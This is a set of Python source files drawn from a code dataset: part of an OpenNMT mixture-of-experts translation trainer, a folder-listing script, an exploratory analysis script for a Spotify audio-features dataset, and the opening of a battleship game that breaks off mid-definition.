for i in range(len(self.dropout_steps)):\n if step > 1 and step == self.dropout_steps[i] + 1:\n self.model.update_dropout(self.dropout[i])\n logger.info(\"Updated dropout to %f from step %d\"\n % (self.dropout[i], step))\n\n def _accum_batches(self, iterator):\n batches = []\n normalization_x2y = normalization_y2x = 0\n self.accum_count = self._accum_count(self.optim.training_step)\n for batch in iterator:\n batches.append(batch)\n if self.norm_method == \"tokens\":\n num_tokens = batch.tgt[0][1:, :, 0].ne(\n self.train_loss.padding_idx).sum()\n normalization_x2y += num_tokens.item()\n num_tokens = batch.src[0][1:, :, 0].ne(\n self.train_loss.padding_idx).sum()\n normalization_y2x += num_tokens.item()\n else:\n normalization_x2y += batch.batch_size\n normalization_y2x += batch.batch_size\n if len(batches) == self.accum_count:\n yield batches, normalization_x2y, normalization_y2x\n self.accum_count = self._accum_count(self.optim.training_step)\n batches = []\n normalization_x2y = normalization_y2x = 0\n if batches:\n yield batches, normalization_x2y, normalization_y2x\n\n def _update_average(self, step):\n if self.moving_average is None:\n copy_params = [params.detach().float()\n for params in self.model.parameters()]\n self.moving_average = copy_params\n else:\n average_decay = max(self.average_decay,\n 1 - (step + 1)/(step + 10))\n for (i, avg), cpt in zip(enumerate(self.moving_average),\n self.model.parameters()):\n self.moving_average[i] = \\\n (1 - average_decay) * avg + \\\n cpt.detach().float() * average_decay\n\n def train(self,\n train_iter,\n train_steps,\n save_checkpoint_steps=5000,\n valid_iter=None,\n valid_steps=10000):\n \"\"\"\n The main training loop by iterating over `train_iter` and possibly\n running validation on `valid_iter`.\n\n Args:\n train_iter: A generator that returns the next training batch.\n train_steps: Run training for this many iterations.\n save_checkpoint_steps: Save a checkpoint every this many\n iterations.\n valid_iter: A generator that returns the next validation batch.\n valid_steps: Run evaluation every this many iterations.\n\n Returns:\n The gathered statistics.\n \"\"\"\n if valid_iter is None:\n logger.info('Start training loop without validation...')\n else:\n logger.info('Start training loop and validate every %d steps...',\n valid_steps)\n\n total_stats = onmt.utils.Statistics(self.num_experts)\n report_stats = onmt.utils.Statistics(self.num_experts)\n self._start_report_manager(start_time=total_stats.start_time)\n\n for i, (batches, normalization_x2y, normalization_y2x) in enumerate(\n self._accum_batches(train_iter)):\n step = self.optim.training_step\n # UPDATE DROPOUT\n self._maybe_update_dropout(step)\n\n if self.gpu_verbose_level > 1:\n logger.info(\"GpuRank %d: index: %d\", self.gpu_rank, i)\n if self.gpu_verbose_level > 0:\n logger.info(\"GpuRank %d: reduce_counter: %d \\\n n_minibatch %d\"\n % (self.gpu_rank, i + 1, len(batches)))\n\n if self.n_gpu > 1:\n normalization_x2y = sum(onmt.utils.distributed\n .all_gather_list\n (normalization_x2y))\n normalization_y2x = sum(onmt.utils.distributed\n .all_gather_list\n (normalization_y2x))\n\n self._gradient_accumulation(\n batches, normalization_x2y, normalization_y2x, \n total_stats, report_stats)\n\n if self.average_decay > 0 and i % self.average_every == 0:\n self._update_average(step)\n\n report_stats = self._maybe_report_training(\n step, train_steps,\n self.optim.learning_rate(),\n report_stats)\n\n if valid_iter is not None and step % valid_steps == 0:\n if self.gpu_verbose_level > 0:\n logger.info('GpuRank %d: validate step %d'\n % (self.gpu_rank, step))\n valid_stats = self.validate(\n valid_iter, moving_average=self.moving_average)\n if self.gpu_verbose_level > 0:\n logger.info('GpuRank %d: gather valid stat \\\n step %d' % (self.gpu_rank, step))\n valid_stats = self._maybe_gather_stats(valid_stats)\n if self.gpu_verbose_level > 0:\n logger.info('GpuRank %d: report stat step %d'\n % (self.gpu_rank, step))\n self._report_step(self.optim.learning_rate(),\n step, valid_stats=valid_stats)\n # Run patience mechanism\n if self.earlystopper is not None:\n self.earlystopper(valid_stats, step)\n # If the patience has reached the limit, stop training\n if self.earlystopper.has_stopped():\n break\n\n if (self.model_saver is not None\n and (save_checkpoint_steps != 0\n and step % save_checkpoint_steps == 0)):\n self.model_saver.save(step, moving_average=self.moving_average)\n\n if train_steps > 0 and step >= train_steps:\n break\n\n if self.model_saver is not None:\n self.model_saver.save(step, moving_average=self.moving_average)\n return total_stats\n\n def validate(self, valid_iter, moving_average=None):\n \"\"\" Validate model.\n valid_iter: validate data iterator\n Returns:\n :obj:`nmt.Statistics`: validation loss statistics\n \"\"\"\n if moving_average:\n # swap model params w/ moving average\n # (and keep the original parameters)\n model_params_data = []\n for avg, param in zip(self.moving_average,\n self.model.parameters()):\n model_params_data.append(param.data)\n param.data = avg.data.half() if self.optim._fp16 == \"legacy\" \\\n else avg.data\n\n # Set model in validating mode.\n self.model.eval()\n\n with torch.no_grad():\n stats = onmt.utils.Statistics(self.num_experts)\n\n for batch in valid_iter:\n src, src_lengths = batch.src\n tgt, tgt_lengths = batch.tgt\n\n # get rz\n lprob_yz = self.get_lprob_yz_x(\n src, tgt, src_lengths, side='x2y') # B x K\n lprob_xz = self.get_lprob_yz_x(\n tgt, src, tgt_lengths, side='y2x') # B x K\n rz1 = torch.nn.functional.softmax(lprob_yz, dim=1)\n rz2 = torch.nn.functional.softmax(lprob_xz, dim=1)\n rz = torch.sqrt(rz1 * rz2)\n winners = rz.max(dim=1)[1]\n\n # get x2y stats\n loss_x2y, stat_dict_x2y = self.get_loss_stats(\n src, tgt, src_lengths, winners, side='x2y')\n # get y2x stats\n loss_y2x, stat_dict_y2x = self.get_loss_stats(\n tgt, src, tgt_lengths, winners, side='y2x')\n \n # batch stats\n batch_stats_x2y = onmt.utils.Statistics(\n self.num_experts, loss=loss_x2y.item(),\n r=rz.sum(dim=0).cpu().numpy(), **stat_dict_x2y)\n batch_stats_y2x = onmt.utils.Statistics(\n self.num_experts, loss=loss_y2x.item(),\n r=rz.sum(dim=0).cpu().numpy(), **stat_dict_y2x)\n\n # Update statistics.\n stats.update(batch_stats_x2y)\n stats.update(batch_stats_y2x)\n\n if moving_average:\n for param_data, param in zip(model_params_data,\n self.model.parameters()):\n param.data = param_data\n\n # Set model back to training mode.\n self.model.train()\n\n return stats\n \n def expert_index(self, i):\n return i + self.vocab.stoi['']\n\n def get_dec_in(self, dec_in, winners):\n dec_in_ = dec_in.clone()\n dec_in_[0, :, 0] = self.expert_index(winners)\n return dec_in_\n\n def get_loss_stats(self, x, y, xlen, winners, side='x2y', weight=None):\n \"\"\"get log p(y,z|x) tensor\n whether z is known or unknown\"\"\"\n\n enc, mem, _ = self.model.encoder(x, xlen)\n input_, target = y[:-1], y[1:]\n\n # hard selection loss\n dec_in = self.get_dec_in(input_, winners)\n loss, stat_dict = self._get_loss_y(\n dec_in, target, enc, mem, x, xlen, side=side, \n reduced_sum=True, weight=weight)\n \n # add prior loss to the loss above, if available\n if self.learned_prior:\n prior = (self.model.prior_x2y if side == 'x2y' else \n self.model.prior_y2x)\n ### excluding logsumexp\n # lprob_z = prior(mem, xlen) # -> B x K\n lprob_z = prior(mem.detach(), xlen) # -> B x K\n lprob_z_winner = lprob_z.gather(\n dim=-1, index=winners.unsqueeze(-1)) # -> B\n loss_z = - lprob_z_winner.sum()\n loss += loss_z\n \n # ### ???????? add xent\n # def _multinomial_xent(prob):\n # kl = - torch.exp(prob) * prob\n # return kl.sum()\n\n # loss += _multinomial_xent(lprob_z)\n\n\n return loss, stat_dict\n\n def _get_loss_y(self, dec_in, target, enc_state, memory_bank, \n x, lengths, side='x2y', reduced_sum=False, weight=None):\n \"\"\"log p(y|x,z) when z is specified in `dec_in`\"\"\"\n decoder = (self.model.decoder_x2y if side == 'x2y' else \n self.model.decoder_y2x)\n\n decoder.init_state(x, enc_state, memory_bank)\n dec_out, _ = decoder(dec_in, memory_bank, \n memory_lengths=lengths, \n with_align=self.with_align)\n\n loss, num_correct, n_words = self.train_loss.compute_loss(\n dec_out, target, reduced_sum=reduced_sum, get_stat=True, weight=weight)\n stat_dict = {\n 'loss_%s' %side: loss.sum().item(),\n 'n_correct_%s' %side: num_correct,\n 'n_words_%s' %side: n_words}\n return loss, stat_dict\n\n def _get_lprob_y(self, dec_in, target, enc_state, memory_bank, \n x, lengths, side='x2y'):\n B = len(lengths)\n loss, stat_dict = self._get_loss_y(\n dec_in, target, enc_state, memory_bank, x, lengths, side=side)\n loss = loss.view(B, -1)\n lprob = -loss.sum(dim=1, keepdim=True) # -> B x 1\n return lprob\n\n def get_lprob_yz_x(self, x, y, xlen, winners=None, side='x2y'):\n \"\"\"get log p(y,z|x) tensor\n whether z is known or unknown\"\"\"\n enc, mem, _ = self.model.encoder(x, xlen)\n input_, target = y[:-1], y[1:]\n if winners is None:\n lprob_y = []\n for i in range(self.num_experts):\n dec_in = self.get_dec_in(input_, i)\n lprob_y_k = self._get_lprob_y(\n dec_in, target, enc, mem, x, xlen, side=side)\n lprob_y.append(lprob_y_k)\n lprob_y = torch.cat(lprob_y, dim=1) # -> B x K\n else:\n dec_in = self.get_dec_in(input_, winners)\n lprob_y = self._get_lprob_y(\n dec_in, target, enc, mem, x, xlen, side=side) # -> B\n\n lprob_yz = lprob_y\n if self.learned_prior:\n prior = (self.model.prior_x2y if side == 'x2y' else \n self.model.prior_y2x)\n # lprob_z = prior(mem, xlen) # -> B x K\n lprob_z = prior(mem.detach(), xlen) # -> B x K\n \n if winners is not None:\n lprob_z = lprob_yz.gather(dim=-1, index=winners.unsqueeze(-1))\n \n lprob_yz += lprob_z\n \n return lprob_yz\n\n def _gradient_accumulation(self, true_batches, normalization_x2y, \n normalization_y2x, total_stats, report_stats):\n if self.accum_count > 1:\n self.optim.zero_grad()\n\n for k, batch in enumerate(true_batches):\n\n batch = self.maybe_noise_source(batch)\n\n # 1. Load data.\n src, src_lengths = batch.src\n tgt, tgt_lengths = batch.tgt\n report_stats.n_src_words += src_lengths.sum().item()\n report_stats.n_tgt_words += tgt_lengths.sum().item()\n\n # 2. F-prop all but generator.\n if self.accum_count == 1:\n self.optim.zero_grad()\n \n # compute responsibilities r = p(z|x,y)\n self.model.eval()\n with torch.no_grad():\n lprob_yz = self.get_lprob_yz_x(\n src, tgt, src_lengths, side='x2y') # B x K\n lprob_xz = self.get_lprob_yz_x(\n tgt, src, tgt_lengths, side='y2x') # B x K\n rz1 = torch.nn.functional.softmax(lprob_yz, dim=1)\n rz2 = torch.nn.functional.softmax(lprob_xz, dim=1)\n rz = torch.sqrt(rz1 * rz2) # posterior!\n self.model.train()\n\n assert not rz.requires_grad\n\n # compute loss\n if self.soft_selection:\n lprob_yz = self.get_lprob_yz_x(\n src, tgt, src_lengths, side='x2y') # B x K\n lprob_xz = self.get_lprob_yz_x(\n tgt, src, tgt_lengths, side='y2x') # B x K\n if self.weighted_grad:\n loss_yz = -LogSumExpMoE.apply(lprob_yz, rz1, 1).sum()\n loss_xz = -LogSumExpMoE.apply(lprob_xz, rz2, 1).sum()\n else:\n loss_yz = -torch.logsumexp(lprob_yz, dim=1).sum()\n loss_xz = -torch.logsumexp(lprob_xz, dim=1).sum()\n stat_dict_x2y = {\n 'loss_x2y': loss_yz.item(),\n 'n_words_x2y': (tgt_lengths - 1).sum().item()}\n stat_dict_y2x = {\n 'loss_y2x': loss_xz.item(),\n 'n_words_y2x': (src_lengths - 1).sum().item()}\n loss = loss_yz + loss_xz\n else:\n if self.learned_prior and self.sampling_z:\n winners = rz.multinomial(1).view(-1) # B\n else:\n winners = rz.max(dim=1)[1] # B\n \n weight = None\n if self.weighted_grad:\n weight = rz.gather(dim=-1, index=winners.unsqueeze(-1)) # B\n\n # loss: -log p(y|x,z) p(z|x) p(x|y,z)\n loss_x2y, stat_dict_x2y = self.get_loss_stats(\n src, tgt, src_lengths, winners, side='x2y', weight=weight)\n loss_y2x, stat_dict_y2x = self.get_loss_stats(\n tgt, src, tgt_lengths, winners, side='y2x', weight=weight)\n loss = loss_x2y + loss_y2x\n\n self.optim.backward(loss)\n stats = onmt.utils.Statistics(self.num_experts, \n loss=loss.item(),\n r=rz.sum(dim=0).cpu().numpy(),\n **stat_dict_x2y, **stat_dict_y2x)\n total_stats.update(stats)\n report_stats.update(stats)\n\n # 4. Update the parameters and statistics.\n if self.accum_count == 1:\n # Multi GPU gradient gather\n if self.n_gpu > 1:\n grads = [p.grad.data for p in self.model.parameters()\n if p.requires_grad\n and p.grad is not None]\n onmt.utils.distributed.all_reduce_and_rescale_tensors(\n grads, float(1))\n self.optim.step()\n\n # in case of multi step gradient accumulation,\n # update only after accum batches\n if self.accum_count > 1:\n if self.n_gpu > 1:\n grads = [p.grad.data for p in self.model.parameters()\n if p.requires_grad\n and p.grad is not None]\n onmt.utils.distributed.all_reduce_and_rescale_tensors(\n grads, float(1))\n self.optim.step()\n\n def _start_report_manager(self, start_time=None):\n \"\"\"\n Simple function to start report manager (if any)\n \"\"\"\n if self.report_manager is not None:\n if start_time is None:\n self.report_manager.start()\n else:\n self.report_manager.start_time = start_time\n\n def _maybe_gather_stats(self, stat):\n \"\"\"\n Gather statistics in multi-processes cases\n\n Args:\n stat(:obj:onmt.utils.Statistics): a Statistics object to gather\n or None (it returns None in this case)\n\n Returns:\n stat: the updated (or unchanged) stat object\n \"\"\"\n if stat is not None and self.n_gpu > 1:\n return onmt.utils.Statistics.all_gather_stats(stat)\n return stat\n\n def _maybe_report_training(self, step, num_steps, learning_rate,\n report_stats):\n \"\"\"\n Simple function to report training stats (if report_manager is set)\n see `onmt.utils.ReportManagerBase.report_training` for doc\n \"\"\"\n if self.report_manager is not None:\n return self.report_manager.report_training(\n step, num_steps, learning_rate, report_stats,\n multigpu=self.n_gpu > 1)\n\n def _report_step(self, learning_rate, step, train_stats=None,\n valid_stats=None):\n \"\"\"\n Simple function to report stats (if report_manager is set)\n see `onmt.utils.ReportManagerBase.report_step` for doc\n \"\"\"\n if self.report_manager is not None:\n return self.report_manager.report_step(\n learning_rate, step, train_stats=train_stats,\n valid_stats=valid_stats)\n\n def maybe_noise_source(self, batch):\n if self.source_noise is not None:\n return self.source_noise(batch)\n return batch\n\n\nclass LogSumExpMoE(torch.autograd.Function):\n \"\"\"Standard LogSumExp forward pass, but use *posterior* for the backward.\n See `\"Mixture Models for Diverse Machine Translation: Tricks of the Trade\"\n (Shen et al., 2019) `_.\n \"\"\"\n\n @staticmethod\n def forward(ctx, logp, posterior, dim=-1):\n ctx.save_for_backward(posterior)\n ctx.dim = dim\n return torch.logsumexp(logp, dim=dim)\n\n @staticmethod\n def backward(ctx, grad_output):\n posterior, = ctx.saved_tensors\n grad_logp = grad_output.unsqueeze(ctx.dim) * posterior\n return grad_logp, None, None\n","sub_path":"onmt/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":27633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"396021619","text":"import os\n# get current directory as cwd\ncwd = os.getcwd()\n# check if a file or directory named 'assets' exists in our cwd\nif os.path.exists('assets')==True:\n for name in os.listdir(cwd):\n if 'assets' == name:\n path = os.path.join(cwd, 'assets')\n # check if 'assets' is a file\n if os.path.isdir(path)==True:\n listItems = os.listdir(path)\n listItems.sort()\n print(listItems)\n for i in listItems:\n print(\"self.\"+i)\n\n","sub_path":"PyCharm_Projects/ImageFileEditor/Mini Project 7/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"314667405","text":"\n#%%\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.stats import norm\nimport pandas as pd\nfrom pandas.plotting import scatter_matrix\nimport sklearn.preprocessing as sklpre\nimport math\nimport os\nimport sys\n#%%\n# data_csv_path = os.path.abspath(os.path.dirname(sys.argv[0])) + \"\\SpotifyFeatures.csv\"\ndata_csv_path = os.path.dirname(__file__) + \"/../csv/SpotifyFeatures.csv\"\nspotifyDBData = pd.read_csv(data_csv_path, sep=',', header=0)\n\n#%%\n# Lets look at popularity - this ould be expected to resemble a normal distribution\ntrackPopularity = spotifyDBData['popularity']\n\n# Find the statistical properties of the popularity\nmu = np.mean(trackPopularity)\nsigma = np.std(trackPopularity)\nsigma2 = np.var(trackPopularity)\nmedian = np.median(trackPopularity)\n\n# Create an object to plot into\nfig, ax = plt.subplots(1, 1, figsize=[10,6])\n\n# Now plot the popularity data to get an idea of it's distribution\nax.hist(trackPopularity,bins=100, density=True, label='Track Popularity') # Normalises the histogram\nplt.xlabel('Popularity rating')\nplt.ylabel('Normalised Counts')\nax.axvline(mu, color='b', label = \"Mean\")\nax.axvline(median, color='r', label=\"Median\")\n\n# Try and fit a gausian distribution\nxarr = np.linspace(np.max(trackPopularity), np.min(trackPopularity), 500)\nax.plot(xarr, norm.pdf(xarr, mu, sigma), label='True gausian PDF')\nax.legend()\n\n\n#%%\naudiofeature_cols = ['popularity', 'acousticness', 'danceability', 'energy', \n 'instrumentalness', 'liveness', 'loudness', 'speechiness', \n 'tempo', 'valence'] \n\ndef plotFeatureDistribution(afeatures):\n\n cols = 2 # How many subplots pr row\n width = 15 # Width of figure\n prop = 0.6 # Subplot proportions, height/width ratio of subfigures\n\n rows = int(len(afeatures)/cols)+1\n height = (rows/cols)*width*prop\n\n fig, ax = plt.subplots(rows, cols, figsize=(width,height))\n plt.subplots_adjust(wspace=0.2, hspace=0.4)\n for index, afeature in enumerate(afeatures):\n row, col = int(index/cols), index % cols\n\n feature_data = spotifyDBData[afeature]\n\n ax[row,col].hist(feature_data, bins=50, density=True, label=afeature.capitalize())\n ax[row,col].axvline(np.mean(feature_data), color='purple', label = \"mean\")\n ax[row,col].axvline(np.median(feature_data), color='r', label = \"median\")\n ax[row,col].axvline(np.percentile(feature_data, 5), color='orange', label = \"5 percentile\")\n ax[row,col].axvline(np.percentile(feature_data, 95), color='orange', label=\"95 percentile\")\n ax[row,col].set_title(afeature.capitalize())\n ax[row,col].get_yaxis().set_visible(False)\n ax[row,col].legend()\n\nplotFeatureDistribution(audiofeature_cols)\n\n#%%\n# All feature names to be used as titles for each subplot\nGenres = spotifyDBData['genre'] # Series containing genres of each track\nUniqueGenres = Genres.unique() # Contains the name of each genre included in DB\n\nprint(UniqueGenres) # Verify \n\ncols = 4 # How many subplots pr row\nwidth = 15 # Width of figure\nprop = 1/3 # Subplot proportions, height/width ratio of subfigures\n\nrows = int(len(UniqueGenres)/cols)+1\nheight = (rows/cols)*width*prop\n\nfig, ax = plt.subplots(rows, cols, figsize=(width,height))\nplt.subplots_adjust(wspace=0.2, hspace=1)\nfor index, genre in enumerate(UniqueGenres):\n row, col = int(index/cols), index % cols\n genre_tracks = spotifyDBData.loc[spotifyDBData['genre'] == genre]\n popularity = genre_tracks['popularity']\n title = genre + \", N = \" + str(len(popularity))\n ax[row,col].hist(popularity, bins=40, density=True, label='Track Popularity')\n ax[row,col].set_title(title)\n \n\n#%%\n# Apply One Hot Encoding to the genre feature\nonehotenc = pd.get_dummies(spotifyDBData, columns=[\"genre\"])\n\n# Rename/format genre column (lowercase, no special symbols)\nreplacements = {' ':'-', '&':'n', '’':''}\nonehotenc.columns = map(lambda s: s.lower().translate(str.maketrans(replacements)), onehotenc.columns)\n\nprint(list(onehotenc.columns)) # Check column names\n\n\n\n#%% split data pr genre\n\ngenres = list(filter(lambda name: \"genre_\" in name, onehotenc.columns))\naudiofeature_cols = ['popularity', 'acousticness', 'danceability', 'energy', \n 'instrumentalness', 'liveness', 'loudness', 'speechiness', \n 'tempo', 'valence'] \n\n\nminmaxscaler = sklpre.MinMaxScaler()\n\ndf_scaled = pd.DataFrame(onehotenc)\ndf_scaled[audiofeature_cols] = pd.DataFrame(\n minmaxscaler.fit_transform(df_scaled[audiofeature_cols]), \n index=df_scaled[audiofeature_cols].index,\n columns=df_scaled[audiofeature_cols].columns)\n\n#df_genre = {}\n#genremean = {}\n#genremedian = {}\n#for genre in genres:\n# onegenre = df_scaled.loc[df_scaled[genre] == 1]\n# onegenre.reset_index(inplace=True, drop=True)\n# gidx = genre.lower()\n# \n# df_genre[gidx] = onegenre.filter(audiofeature_cols)\n# \n# genremean[gidx] = df_genre[gidx].mean().values.flatten().tolist()\n# genremedian[gidx] = df_genre[gidx].median().values.flatten().tolist()\n# genremin[gidx] = df_genre[gidx].min().values.flatten().tolist()\n# genremax[gidx] = df_genre[gidx].max().values.flatten().tolist()\n \ntracks = {genre: df_scaled.loc[df_scaled[genre] == 1]\n .reset_index(drop=True)\n .filter(audiofeature_cols)\n for genre in genres}\n \naudiofeatures = {genre.replace(\"genre_\",\"\"): tracks[genre].describe()\n for genre in genres}\n\n# Mean and meadian\nafeatures_mean = {genre: tracks[genre].mean().values.flatten().tolist()\n for genre in genres}\nafeatures_median = {genre: tracks[genre].median().values.flatten().tolist()\n for genre in genres}\n\n#%% Radar plots\n\ndef radar_subplot(categories, data, title=None, subplotpos=(1,1,1)):\n # Dimension angles\n N = len(categories)\n angles = [n / float(N) * 2 * math.pi for n in range(N)]\n \n # Create polar subplot\n ax = plt.subplot(subplotpos[0],subplotpos[1],subplotpos[2], polar=True)\n ax.set_rlabel_position(0)\n ax.set_title(title)\n plt.xticks(angles, categories, color='grey', size=10)\n plt.yticks([0.2,0.4,0.6,0.8], [\"0.2\",\"0.4\",\"0.6\",\"0.8\"], color=\"grey\", size=10)\n plt.ylim(0,1)\n \n # Plot one line/shape pr item in data\n plotdata = data if isinstance(data[0],list) else [data]\n angles += angles[:1]\n for values in plotdata:\n plotvalues = values + values[:1] # Line finishes same place as it starts\n ax.plot(angles, plotvalues, linewidth=1, linestyle='solid')\n ax.fill(angles, plotvalues, 'b', alpha=0.1)\n\ndef plot_audiofeatures_radar(genres, cols=3, width=18, hspace=0.3):\n rows = int(len(genres)/cols)+1\n height = width*(rows/cols) \n plt.figure(figsize=(width,height))\n plt.subplots_adjust(hspace=hspace)\n for idx, genre in enumerate(genres):\n genre = genre if genre.startswith(\"genre_\") else \"genre_\" + genre\n categories = list(tracks[genre])\n subplot = (rows, cols, idx+1)\n layers = [afeatures_mean[genre], afeatures_median[genre]]\n title = genre.replace(\"genre_\",\"\").capitalize()\n radar_subplot(categories, layers, title, subplot)\n \n# plot_audiofeatures_radar([\"blues\", \"classical\", \"comedy\", \"country\", \"electronic\", \n# \"folk\", \"jazz\", \"opera\", \"rap\", \"rock\", \"reggae\", \"soul\"])\n\n#%%\n\nall_genres = [\n 'dance',\n 'indie',\n 'pop',\n 'rnb',\n 'rap',\n 'reggae',\n 'reggaeton',\n 'rock',\n 'ska',\n 'folk',\n 'jazz',\n 'classical',\n 'comedy',\n 'country',\n 'electronic',\n 'hip-hop',\n 'movie',\n 'opera',\n 'soul',\n 'soundtrack',\n 'world']\nplot_audiofeatures_radar(all_genres, width=16)\n#%% Radar diagrams above works well - what we are actually doing is looking for distinctions between the genres\n# Could have been achieved by plotting mean on y, genre on x for each feature.. Tiresome, which is why radar diagrams\n# was used\n\ndef plot_nonOptimalFeaturePlot(fname, genres, width=10, hspace=0.3):\n plt.figure(figsize=(width, width))\n means = []\n xtickPos = []\n for i, genre in enumerate(genres):\n genre = genre if genre.startswith(\"genre_\") else \"genre_\" + genre\n findex = audiofeature_cols.index(fname)\n means.append(afeatures_mean[genre][findex])\n xtickPos.append(i) \n \n plt.bar(xtickPos, means)\n plt.xticks(xtickPos, [genre.capitalize() for genre in genres])\n \nfeatures = [\"popularity\",]\n\nplot_nonOptimalFeaturePlot(\"popularity\", [\"blues\", \"classical\", \"comedy\", \"country\", \"electronic\", \n \"folk\", \"jazz\", \"opera\", \"rap\", \"rock\", \"reggae\", \"soul\"])\n \n \n#%%\n \nattributes = [\"tempo\", \"popularity\", \"acousticness\", \"danceability\", \"energy\"]\naxs = scatter_matrix(onehotenc[attributes], figsize=(20,20), alpha=0.01)\n\n\n#%%\natt2 = [\"popularity\",\"instrumentalness\", \"liveness\", \"speechiness\", \"valence\"]\naxs = scatter_matrix(onehotenc[att2], figsize=(20,20), alpha=0.01)\n\n#%%\natt3 = [\"popularity\",\"duration_ms\"]\naxs = scatter_matrix(onehotenc[att3], figsize=(20,20), alpha=0.01)\n\n#%%\natt4 = [\"duration_ms\",\"genre\"]\naxs = scatter_matrix(spotifyDBData[att4], figsize=(20,20), alpha=0.01)\n#%% How about danceability ? Can it be used to predict popularity?\nPD = spotifyDBData[['danceability','energy']]\ncorrcoef = np.corrcoef(PD.T) # obs: rækker=variable, kolonner=samples (modsat normalt..)\n\n\n#%% ---------------------- REMOVING ALL THE SONGS WITH A 0 POPULARITY RATING --------------------------\nprint(\"===============================================================================================\")\nprint(\"================================= PERFORMING DATA CLEANING ====================================\")\nprint(\"===============================================================================================\")\n\ngenres.remove(\"genre_a-capella\")\n# Removing ALL samples with a popularity of 0\nfor genre in genres:\n tracks[genre] = tracks[genre][tracks[genre].popularity > 0.01]\n \ncols = 4 # How many subplots pr row\nwidth = 15 # Width of figure\nprop = 1/3 # Subplot proportions, height/width ratio of subfigures\n\nrows = int(len(UniqueGenres)/cols)+1\nheight = (rows/cols)*width*prop\n\nfig, ax = plt.subplots(rows, cols, figsize=(width,height))\nplt.subplots_adjust(wspace=0.2, hspace=1)\nfor index, genre in enumerate(genres):\n row, col = int(index/cols), index % cols\n #genre_tracks = spotifyDBData.loc[spotifyDBData['genre'] == genre]\n popularity = tracks[genre]['popularity']\n title = genre + \", N = \" + str(len(popularity))\n ax[row,col].hist(popularity, bins=40, density=True, label='Track Popularity')\n ax[row,col].set_title(title)\n\n# THAT'S MORE LIKE IT ! GREAT CLEANING!\n\n#%% -------------- CHECK THE DURATION FEATURE IF SCALING CAN BE DONE ------------------------------\ncols = 4 # How many subplots pr row\nwidth = 15 # Width of figure\nprop = 1/3 # Subplot proportions, height/width ratio of subfigures\n\nrows = int(len(UniqueGenres)/cols)+1\nheight = (rows/cols)*width*prop\n\nfig, ax = plt.subplots(rows, cols, figsize=(width,height))\nplt.subplots_adjust(wspace=0.2, hspace=1)\nfor index, genre in enumerate(UniqueGenres):\n if genre != \"A Capella\":\n row, col = int(index/cols), index % cols\n genre_tracks = spotifyDBData.loc[spotifyDBData['genre'] == genre]\n duration = genre_tracks['duration_ms']\n title = genre + \", N = \" + str(len(duration))\n ax[row,col].hist(duration, bins=40, density=True, label='Track Popularity')\n ax[row,col].set_title(title)\n \n sub_mean = np.mean(duration)\n sub_median = np.median(duration)\n sub_max = np.max(duration)\n print(sub_max)\n \n ax[row,col].axvline(sub_mean, color='b', label = \"Mean\")\n ax[row,col].axvline(sub_median, color='r', label=\"Median\")\n ax[row,col].axvline(sub_max, color='y', label=\"Max\")\n \n sub_max = 0\n \n# Should we just filter out the outliers of duration as well? Could one go about\n# it differently, e.g is there to manny to simply assign them to the mean? tendency\n# seems to be that duration for each genre has a nice distribution. \n# Would it be beneficial to convert units - e.g from ms to s? Decrease the size\n# of the numbers before performing the scaling? \n \n \n#%% What should one do about the Key feature? \ndef uniqueFeatureLabels(df, fName):\n UniqueLabels = df[fName].unique() \n print(\"Unique labels for \", fName,\":\", len(UniqueLabels))\n \nuniqueFeatureLabels(spotifyDBData, \"key\") # = 12\n\n# Is it feasible to one hot encode this ? This would add an additional 11 features\n# - This combined with the genre encoding could cause feature overload? Would our model\n# Have enough samples to learn? Should this feature be dropped completely?\n\n# It has been decided to drop this feature - as our samplesize is only 230000, minus the ones\n# with 0 popularity rating. For fear of inproper training of the model due to the sheer size\n# of the feature list, this feature will be dropped. \n\n# ---------------- What should one do about mode? ---------------------------------\nuniqueFeatureLabels(spotifyDBData, 'mode') # = 2\n# Only expands to one addtional feature - should be one hot encoded. \n# Decided to include this. Use one hot encoding. \n\n#%%\n# ------------ What should one do about time_signature feature? -------------------\nuniqueFeatureLabels(spotifyDBData, 'time_signature') # = 5\n# Is it feasible to encode into 4 addtional features? ... \n# Clean this data - 1/4 and 0/4 should be removed. \n# 0/4 does not exit? Drop this. \nfig, ax = plt.subplots(1, 1, figsize=(width,height))\nUniqueTS = spotifyDBData['time_signature'].unique()\nN_uTS = []\nfor TS in UniqueTS:\n inSignature = spotifyDBData[spotifyDBData['time_signature'] == TS]\n N_uTS.append(len(inSignature))\n print(\"For time signature: \", TS, \", samples: \", len(inSignature))\n \n\nax.hist(N_uTS, bins=5, density=True, label='Track Popularity')\n \n\n#%% Last part, when above is done, create a new script without plots that only performs data cleaning and feature scaling\n# Let it store the result as a new csv file from which the next step in the pipeline can read from...\n\n# REMEMBER:\n# OneHotEncoder CANNOT BE USED FOR Y VALUES - USE LABELBINARIZER INSTEAD!\n\n","sub_path":"Slutprojekt/Bilag/visualization_and_preprocessing/visualization_and_cleaning.py","file_name":"visualization_and_cleaning.py","file_ext":"py","file_size_in_byte":14190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"474984276","text":"import random\n\n#Game User Preparation\ndef int_create(string):\n number_as_list=[x for x in string if x.isdigit()]\n if number_as_list==[]:\n number_as_list=[\"0\"]\n return int(\"\".join(number_as_list))\n\n#player_amount=int_create(input(\"1/2 player? \"))\n#while player_amount!=1 and player_amount!=2:\n# player_amount=int_create(input(\"1/2 player? \"))\nplayer_amount=1\nsettings={\"l1amount\":6,\"l2amount\":4,\"l3amount\":2,\"rang\":8}\n#settingnames{\"l1amount\":\"Amount of 1-length ships\",\n# \"l2amount\":\"Amount of 2-length ships\",\n# \"l3amount\":\"Amount of 3-length ships\",\n# \"rang\":\"Size of map\"}\nship_dict=[]\n\nprint(\"1 - Play\\n2 - Settings\")\nchoice=0\nwhile choice!=1 and choice!=2:\n choice=int_create(input(\"\"))\nif choice==2:\n while True:\n for setting in settings:\n print(\"{} - {}\".format(setting,settings[setting]))\n print(\"To change a setting, type it in and type the new variable.\")\n print(\"To finish changing settings, type in 'end'\")\n change=input(\"\")\n if change==\"end\":\n break\n else:\n for setting in settings:\n if setting==change:\n settings[setting]=int_create(input(\"Enter the new setting: \"))\n \n#Game Preparation\ndef 